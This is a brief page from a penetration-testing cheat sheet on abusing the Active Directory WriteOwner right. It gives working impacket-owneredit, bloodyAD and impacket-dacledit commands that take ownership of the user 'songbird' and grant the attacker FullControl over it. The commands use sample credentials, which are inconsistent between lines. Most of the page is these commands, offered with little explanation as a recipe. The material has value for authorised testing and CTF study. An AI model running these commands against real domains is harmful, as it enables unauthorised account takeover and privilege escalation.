search
DiscordHackTheBoxTryHackMeGitHub

WriteOwner

hashtag
Writing an owner

We only have rights to write owner, it doesn't mean we are the owner. But here we are changing that

impacket-owneredit -action 'write' -new-owner 's.reed' -target 'songbird' 'MILITECH.LOCAL'/'S.REED':'P@ssword123'
bloodyAD --host "13.13.13.13" -d "MILITECH.LOCAL" -u "s.reed" -p "Password123" set owner management songbird

hashtag
Adding a FullAccess DACL

Since we are the owner, we can write to ourselves full access to user songbird. Groups also count, just change target to songbird to group name.

impacket-dacledit -action 'write' -rights 'FullControl' -principal 's.reed' -target 'songbird' 'MILITECH.LOCAL'/'S.REED':'P@ssword123'

hashtag
RESOURCES

LogoGrant ownership | The Hacker Recipeswww.thehacker.recipeschevron-right
LogoGrant rights | The Hacker Recipeswww.thehacker.recipeschevron-right
PreviousForceChangePasswordNextTrust Abuse

Last updated